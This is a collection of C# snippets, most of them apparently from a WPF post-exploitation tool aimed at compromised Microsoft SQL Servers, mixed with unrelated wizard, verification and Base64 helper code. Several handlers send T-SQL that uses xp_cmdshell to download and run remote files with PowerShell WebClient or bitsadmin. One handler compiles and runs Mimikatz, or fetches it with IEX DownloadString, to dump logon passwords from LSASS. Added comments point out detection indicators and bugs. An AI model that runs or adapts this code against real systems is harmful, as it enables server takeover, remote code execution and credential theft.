Example #1
        /// <summary>
        /// Builds the wizard view model in its initial state: navigation flags,
        /// helper services, the session values copied from the shared
        /// <c>MainViewModel</c>, and the first slide.
        /// </summary>
        public WizardViewModel()
        {
            // Initial button/indicator state for the first wizard page.
            PrevEnabled  = false;
            NextEnabled  = true;
            CloseEnabled = true;
            CheckEnabled = false;
            SkipEnabled  = true;
            Loading      = false;

            // Collaborators used by the wizard steps.
            Permiso     = new PermissionValidator();
            Api         = new ApiService();
            Codificator = new EncodeBase64();

            IsAnalyzing = false;
            IsScanning  = false;

            // The session token and user are read once from the MainViewModel singleton;
            // later changes on MainViewModel are not reflected in these copies.
            var session = MainViewModel.GetInstance();
            token = session.Token;
            user  = session.User;

            // Start at slide 0 and load the slide set.
            PositionWizard = 0;
            LoadSlides();
        }
        /// <summary>
        /// Click handler for the "download" action. It queries the xp_cmdshell state on the
        /// server selected in <c>lstLooted</c> and, once that state is reported as active,
        /// sends a T-SQL batch that runs a PowerShell <c>WebClient.DownloadFile</c> command
        /// through <c>xp_cmdshell</c>, using the URL and save path typed into the form.
        /// </summary>
        /// <remarks>
        /// Defender note: the observable side of this handler is xp_cmdshell being used on the
        /// database server and a PowerShell download started from the SQL Server process.
        /// Auditing configuration changes to xp_cmdshell and alerting on child processes of
        /// the SQL Server service cover both.
        /// </remarks>
        private void btnDownload_Click(object sender, RoutedEventArgs e)
        {
            // Local copies of the shared flags; the closures below update only these copies,
            // cmdControl itself is not written back in this method.
            var isActivated = cmdControl.isActivated;
            var isExecuted  = cmdControl.isExecuted;

            if (isActivated == false && isExecuted == false)
            {
                // NOTE(review): SelectedItem is dereferenced outside the try block, so a
                // null selection throws before any error handling is in place.
                var enableXpCmdShell = new EnableXpCmdShell {
                    LootedServer = lstLooted.SelectedItem.ToString()
                };
                try
                {
                    // Synchronous dispatch: the flags set inside are visible to the check below.
                    Dispatcher.Invoke((Action) delegate
                    {
                        enableXpCmdShell.XpCmdShellStatus();
                        txtStatus.AppendText(enableXpCmdShell.Result);
                        // Success is detected by matching the result text against the
                        // localized resource string "XPCmdShell2".
                        var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
                        var contains      = enableXpCmdShell.Result.Contains(cmdLandResult);
                        if (contains == true)
                        {
                            isActivated = true;
                            isExecuted  = true;
                        }
                    });
                }
                catch (Exception)
                {
                    // The exception object is discarded; only the helper's own
                    // CmdException text is shown to the operator.
                    Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                    {
                        txtStatus.AppendText(enableXpCmdShell.CmdException);
                    });
                }
            }
            if (isExecuted == true && isActivated == true)
            {
                Dispatcher.Invoke((Action) delegate
                {
                    // The URL and path are concatenated unescaped into a single-quoted
                    // PowerShell string; a quote in either field changes the command.
                    var clearText = "(new-object System.Net.WebClient).DownloadFile('" + txtUrl.Text + "', '" + txtSaveLocation.Text + "')";
                    // ConvertTextToBase64NonBypass is defined elsewhere; presumably it wraps
                    // the text as an encoded PowerShell command line - confirm in EncodeBase64.
                    clearText     = EncodeBase64.ConvertTextToBase64NonBypass(clearText);
                    var _execCode = string.Empty;
                    _execCode    += "EXEC xp_cmdshell '" + clearText + "'";
                    txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}");
                    RevConn(_execCode);
                });
            }
        }
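        /// <summary>
        /// Posts the key from <c>tboxKey</c> together with the encoded template and query
        /// images to the local PrintVerification endpoint and returns the response body.
        /// </summary>
        /// <returns>The raw text of the HTTP response.</returns>
        /// <exception cref="WebException">
        /// Thrown by the request when the endpoint cannot be reached or answers with an error status.
        /// </exception>
        private string ComputeVerification()
        {
            var key             = tboxKey.Text;
            var templateEncoded = EncodeBase64.ImageToBase64(template.FileBytes);
            var queryEncoded    = EncodeBase64.ImageToBase64(query.FileBytes);

            var ps = new[] { "key", key, "template", templateEncoded, "query", queryEncoded };

            // Every name and value is percent-encoded before it goes into the form body.
            // Without this, a '&' or '=' typed into the key field adds or overrides form
            // parameters, and the '+' characters of Base64 data are read as spaces by a
            // form decoder on the receiving side.
            var body = new StringBuilder();
            for (int i = 0; i + 1 < ps.Length; i += 2)
            {
                if (body.Length > 0)
                {
                    body.Append('&');
                }
                body.Append(WebUtility.UrlEncode(ps[i]));
                body.Append('=');
                body.Append(WebUtility.UrlEncode(ps[i + 1]));
            }

            // After percent-encoding the body contains ASCII characters only.
            byte[] buffer = Encoding.ASCII.GetBytes(body.ToString());

            // NOTE(review): the endpoint is hard-coded plain HTTP, so the key travels
            // unencrypted; that is only acceptable while the target stays on loopback.
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create("http://localhost:53210/api/PrintVerification/");

            request.Proxy         = WebRequest.DefaultWebProxy;
            request.Method        = "POST";
            request.ContentType   = "application/x-www-form-urlencoded";
            request.ContentLength = buffer.Length;

            // The request stream is closed before the response is read, and every stream
            // is released even when the request throws.
            using (Stream requestStream = request.GetRequestStream())
            {
                requestStream.Write(buffer, 0, buffer.Length);
            }

            using (WebResponse response = request.GetResponse())
            using (Stream responseStream = response.GetResponseStream())
            using (StreamReader reader = new StreamReader(responseStream))
            {
                return reader.ReadToEnd();
            }
        }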
 /// <summary>
 /// Runs the supplied T-SQL batch against the server selected in <c>lstLooted</c> through
 /// <c>_postExploitation</c> and reports the outcome in <c>txtStatus</c>. When the result
 /// text contains "be resolved", a second download attempt is made with
 /// <c>Invoke-WebRequest</c>.
 /// </summary>
 /// <param name="execCode">The T-SQL text assigned to <c>_postExploitation.ExploitCode</c>.</param>
 private void RevConn(string execCode)
 {
     try
     {
         // -1 means nothing is selected in the server list.
         if (lstLooted.SelectedIndex != -1)
         {
             try
             {
                 var isError = false;
                 Dispatcher.Invoke((Action) delegate
                 {
                     _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                     _postExploitation.ExploitCode  = execCode;
                     _postExploitation.RunExploit();
                     var result = _postExploitation.ExploitResult;
                     // Outcome is inferred from substrings of the returned output text.
                     isError    = result.Contains("be resolved");
                     if (result == "\r\n")
                     {
                         txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("ExploitClearLog2"));
                     }
                     else if (isError == true)
                     {
                         txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6"));
                     }
                     else if (isError == false)
                     {
                         // Only output containing "Completed" produces a success message;
                         // any other non-error output is not reported.
                         var result2 = result.Contains("Completed");
                         if (result2 == true)
                         {
                             txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload8") + txtSaveLocation.Text);
                         }
                     }
                     // Second attempt: the same download expressed with Invoke-WebRequest.
                     if (isError == true)
                     {
                         txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload7"));
                         _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                         txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}");
                         // URL and path are concatenated unescaped into double-quoted
                         // PowerShell arguments.
                         var expCode = EncodeBase64.ConvertTextToBase64NonBypass("Invoke-WebRequest \"" + txtUrl.Text + "\" -OutFile \"" + txtSaveLocation.Text + "\"");
                         _postExploitation.ExploitCode = "EXEC xp_cmdshell '" + expCode + "'";
                         _postExploitation.RunExploit();
                         var resultz = _postExploitation.ExploitResult;
                         // The reset to false is overwritten by the next statement.
                         isError     = false;
                         isError     = resultz.Contains("be resolved");
                         if (resultz == "\r\n")
                         {
                             txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("ExploitClearLog2"));
                         }
                         else if (isError == true)
                         {
                             txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6"));
                         }
                         else if (isError == false)
                         {
                             // NOTE(review): this branch uses "MessageDownload6", the same
                             // resource as the error branch above, while the first attempt
                             // reports success with "MessageDownload8" - confirm which is intended.
                             txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6") + txtSaveLocation.Text);
                         }
                     }
                 });
             }
             catch (Exception exp)
             {
                 // Format order is {2}{3}{0}{1}: the two localized prefixes, a newline, then the message.
                 Dispatcher.Invoke((Action) delegate
                 {
                     txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                 });
             }
         }
         else
         {
             Dispatcher.Invoke((Action) delegate
             {
                 txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitError1")}");
             });
         }
     }
     catch (Exception exp)
     {
         // Same handler as the inner catch; reached for exceptions raised outside the inner try.
         Dispatcher.Invoke((Action) delegate
         {
             txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
         });
     }
 }
        /// <summary>
        /// Click handler for "download and execute". After the xp_cmdshell state is reported
        /// as active, it builds T-SQL batches that fetch a file to the path in
        /// <c>txtSaveLocation</c> and then run that path through <c>xp_cmdshell</c>; the
        /// transfer uses either BITS (<c>rdBits</c> checked) or a PowerShell WebClient call.
        /// </summary>
        /// <remarks>
        /// Defender note: the BITS branch starts the BITS service and creates a bitsadmin
        /// transfer job with the fixed name "WarSQLiJob"; both, like any process started by
        /// the SQL Server service through xp_cmdshell, are practical detection points.
        /// </remarks>
        private void btnDownloadExecute_Click(object sender, RoutedEventArgs e)
        {
            // Local copies of the shared flags; only these copies are updated below.
            var isActivated = cmdControl.isActivated;
            var isExecuted  = cmdControl.isExecuted;

            if (isActivated == false && isExecuted == false)
            {
                // NOTE(review): SelectedItem is dereferenced outside the try block.
                var enableXpCmdShell = new EnableXpCmdShell {
                    LootedServer = lstLooted.SelectedItem.ToString()
                };
                try
                {
                    Dispatcher.Invoke((Action) delegate
                    {
                        enableXpCmdShell.XpCmdShellStatus();
                        txtStatus.AppendText(enableXpCmdShell.Result);
                        // Success is detected by matching the localized string "XPCmdShell2".
                        var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
                        var contains      = enableXpCmdShell.Result.Contains(cmdLandResult);
                        if (contains == true)
                        {
                            isActivated = true;
                            isExecuted  = true;
                        }
                    });
                }
                catch (Exception)
                {
                    Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                    {
                        txtStatus.AppendText(enableXpCmdShell.CmdException);
                    });
                }
            }
            if (isExecuted == true && isActivated == true)
            {
                if (rdBits.IsChecked == true)
                {
                    // NOTE(review): the delegate is queued with BeginInvoke, so exceptions
                    // raised inside it are presumably not seen by this try/catch - confirm.
                    try
                    {
                        // Only this branch checks that URL and save path are non-empty.
                        if (!string.IsNullOrEmpty(txtUrl.Text) && !string.IsNullOrEmpty(txtSaveLocation.Text))
                        {
                            var _execCode = string.Empty;
                            Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                            {
                                // _execCode is appended to and never cleared, so the second and
                                // third RevConn calls also carry the earlier statements.
                                // The two-argument RevConn overload is not part of this listing.
                                _execCode += "USE [master]\r\n";
                                _execCode += "EXEC xp_cmdshell '\"net start BITS\"';\r\n";
                                txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload1")}");
                                RevConn(_execCode, 0);
                                _execCode += "USE [master]\r\n";
                                // URL and path are concatenated unescaped into the command line.
                                _execCode += "EXEC xp_cmdshell '\"bitsadmin /transfer WarSQLiJob /download /priority normal " + txtUrl.Text + " " + txtSaveLocation.Text + "\"';\r\n";
                                txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload2")}");
                                RevConn(_execCode, 0);
                                _execCode += "USE [master]\r\n";
                                _execCode += "EXEC xp_cmdshell '\"" + txtSaveLocation.Text + "\"';\r\n";
                                txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}");
                                RevConn(_execCode, 0);
                            });
                        }
                    }
                    catch (Exception exp)
                    {
                        Dispatcher.Invoke((Action) delegate
                        {
                            txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                        });
                    }
                }
                else
                {
                    // PowerShell branch: no emptiness check and no try/catch at this level.
                    Dispatcher.Invoke((Action) delegate
                    {
                        var clearText = "(new-object System.Net.WebClient).DownloadFile('" + txtUrl.Text + "', '" + txtSaveLocation.Text + "')";
                        // ConvertTextToBase64 is defined elsewhere; its exact output format
                        // is not visible in this listing.
                        clearText     = EncodeBase64.ConvertTextToBase64(clearText);
                        var _execCode = string.Empty;
                        _execCode    += "EXEC xp_cmdshell '" + clearText + "'";
                        txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}");
                        RevConn(_execCode, 1);

                        // Second batch: run the saved path itself through xp_cmdshell.
                        _execCode  = string.Empty;
                        _execCode += "EXEC xp_cmdshell '" + txtSaveLocation.Text + "'\r\n";
                        txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}");
                        RevConn(_execCode, 0);
                    });
                }
            }
        }
 /// <summary>
 /// Click handler that converts the text in <c>txtClearText</c> with
 /// <c>EncodeBase64.ConvertTextToBase64</c> and shows the result in <c>txtBase64</c>.
 /// </summary>
 private void BtnConvert_OnClick(object sender, RoutedEventArgs e)
 {
     var converted = EncodeBase64.ConvertTextToBase64(txtClearText.Text);
     txtBase64.Text = converted;
 }
Example #7
        /// <summary>
        /// Click handler for the credential-dumping action. Once the xp_cmdshell state is
        /// reported as active it follows one of two paths. In local mode (<c>rdLocal</c>
        /// checked) it reads Scanner\Mimikatz\1.txt, stores the bytes on the selected server
        /// through <c>_postExploitation</c>, exports them to disk with bcp.exe, compiles that
        /// file with csc.exe and runs the result. Otherwise it sends a PowerShell command that
        /// downloads a script from the URL in <c>txtUrl</c> and calls Invoke-Mimikatz.
        /// </summary>
        /// <remarks>
        /// Defender note: the code leaves fixed artefacts that are usable as detection
        /// indicators - the table name WarSQLiTemp, bcp.exe and csc.exe started through
        /// xp_cmdshell, files under C:\Users\MSSQLSERVER\ and the output name eyup.exe.
        /// The sekurlsa::logonPasswords command reads credentials from LSASS memory, which
        /// is what LSA protection and Credential Guard are designed to restrict.
        /// </remarks>
        private void btnRun_Click(object sender, RoutedEventArgs e)
        {
            // Local copies of the shared flags; only these copies are updated below.
            var isActivated = cmdControl.isActivated;
            var isExecuted  = cmdControl.isExecuted;

            if (isActivated == false && isExecuted == false)
            {
                // NOTE(review): SelectedItem is dereferenced outside the try block.
                var enableXpCmdShell = new EnableXpCmdShell {
                    LootedServer = lstLooted.SelectedItem.ToString()
                };
                try
                {
                    Dispatcher.Invoke((Action) delegate
                    {
                        enableXpCmdShell.XpCmdShellStatus();
                        txtStatus.AppendText(enableXpCmdShell.Result);
                        // Success is detected by matching the localized string "XPCmdShell2".
                        var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
                        var contains      = enableXpCmdShell.Result.Contains(cmdLandResult);
                        if (contains == true)
                        {
                            isActivated = true;
                            isExecuted  = true;
                        }
                    });
                }
                catch (Exception)
                {
                    Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                    {
                        txtStatus.AppendText(enableXpCmdShell.CmdException);
                    });
                }
            }
            if (isExecuted == true && isActivated == true)
            {
                if (rdLocal.IsChecked == true)
                {
                    var savedFileNAme = string.Empty;
                    // The file is read outside any try block; a missing file throws here.
                    var mimiBinary    = File.ReadAllBytes(@"Scanner\Mimikatz\1.txt");
                    // Stage 1: create the table and insert the bytes (helper semantics are
                    // inferred from their names; the helpers are not part of this listing).
                    try
                    {
                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                            _postExploitation.CreateBinaryTable();
                            txtStatus.AppendText(_postExploitation.ExploitResult);


                            _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                            _postExploitation.BinaryData   = mimiBinary;
                            _postExploitation.InsertBinaryData();
                            txtStatus.AppendText(_postExploitation.ExploitResult);
                        });
                    }
                    catch (Exception exp)
                    {
                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                        });
                    }

                    // Stage 2: export the table content to a file on the server with bcp.exe.
                    try
                    {
                        _postExploitation.ExploitCode = string.Empty;
                        // File name: 12 characters from digits and upper-case letters. The
                        // alphabet has no 'Q', and because the upper bound of Random.Next is
                        // exclusive the last character 'Z' is never chosen - relevant when
                        // writing a file-name pattern for detection.
                        var rnd            = new Random();
                        var chr            = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZ".ToCharArray();
                        var randomFileName = string.Empty;
                        for (int i = 0; i < 12; i++)
                        {
                            randomFileName += chr[rnd.Next(0, chr.Length - 1)].ToString();
                        }
                        var extension = "txt";
                        _postExploitation.ExploitCode += "DECLARE @cmd  VARCHAR(8000);";
                        _postExploitation.ExploitCode += "SET @cmd = 'bcp.exe \"SELECT CAST(binaryTable AS VARCHAR(MAX)) FROM WarSQLiTemp\" queryout \"C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension + "\" -c -T';";
                        _postExploitation.ExploitCode += "EXEC xp_cmdshell  @cmd;";

                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                            _postExploitation.RunExploit();
                            txtStatus.AppendText(_postExploitation.ExploitResult);
                            txtStatus.AppendText("File Saved: C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension);
                            // savedFileNAme is assigned inside the queued delegate and read
                            // by the delegate queued in the last stage below.
                            savedFileNAme = "C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension;
                        });
                    }
                    catch (Exception exp)
                    {
                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                        });
                    }

                    // Stage 3: remove the temporary table.
                    try
                    {
                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                            _postExploitation.RemoveTempTable();
                            txtStatus.AppendText(_postExploitation.ExploitResult);
                        });
                    }
                    catch (Exception exp)
                    {
                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                        });
                    }

                    // Stage 4: compile the exported file with the framework's csc.exe and
                    // run the output; both paths are hard-coded.
                    try
                    {
                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            _postExploitation.ExploitCode  = string.Empty;
                            _postExploitation.ExploitCode += "EXEC xp_cmdshell 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Users\\MSSQLSERVER\\eyup.exe " + savedFileNAme + "';";
                            _postExploitation.RunExploit();
                            txtStatus.AppendText(_postExploitation.ExploitResult);
                        });
                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            _postExploitation.ExploitCode  = string.Empty;
                            _postExploitation.ExploitCode += "EXEC xp_cmdshell 'cmd.exe /c C:\\Users\\MSSQLSERVER\\eyup.exe';";
                            _postExploitation.RunExploit();
                            txtStatus.AppendText(_postExploitation.ExploitResult);
                        });
                    }
                    catch (Exception exp)
                    {
                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                        });
                    }
                }
                else
                {
                    // Remote mode: a single PowerShell command downloads and runs a script
                    // from the operator-supplied URL, so nothing is written to a table or
                    // compiled on the server in this branch.
                    try
                    {
                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                            var sendMimiText = "IEX (New-Object Net.WebClient).DownloadString('" + txtUrl.Text + "'); Invoke-Mimikatz -Command \"privilege::debug sekurlsa::logonPasswords exit\"";
                            // ConvertTextToBase64 is defined elsewhere; its exact output format
                            // is not visible in this listing.
                            var psBs64       = EncodeBase64.ConvertTextToBase64(sendMimiText);
                            _postExploitation.ExploitCode  = string.Empty;
                            _postExploitation.ExploitCode += "EXEC xp_cmdshell '" + psBs64 + "';";
                            _postExploitation.RunExploit();
                            txtStatus.AppendText(_postExploitation.ExploitResult);
                        });
                    }
                    catch (Exception exp)
                    {
                        Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                        {
                            txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                        });
                    }
                }
            }
        }
        /// <summary>
        /// Converts a stored message back to its display form by passing it through
        /// <c>EncodeBase64.Decode</c>.
        /// </summary>
        /// <param name="msg">The stored text to decode.</param>
        /// <returns>The value returned by <c>Decode</c>.</returns>
        public static string ToView(string msg)
        {
            // The decoded text is whatever was originally submitted; it still needs
            // output encoding wherever it is rendered.
            return new EncodeBase64().Decode(msg);
        }
        /// <summary>
        /// Converts a message to its storage form by passing it through
        /// <c>EncodeBase64.Encode</c>.
        /// </summary>
        /// <param name="msg">The text to encode before it is stored.</param>
        /// <returns>The value returned by <c>Encode</c>.</returns>
        public static string ToDatabase(string msg)
        {
            // NOTE(review): Base64 is a reversible encoding and gives no confidentiality;
            // if this is meant to neutralise quotes before a query is built, parameterized
            // queries are still required - confirm how callers use the result.
            return new EncodeBase64().Encode(msg);
        }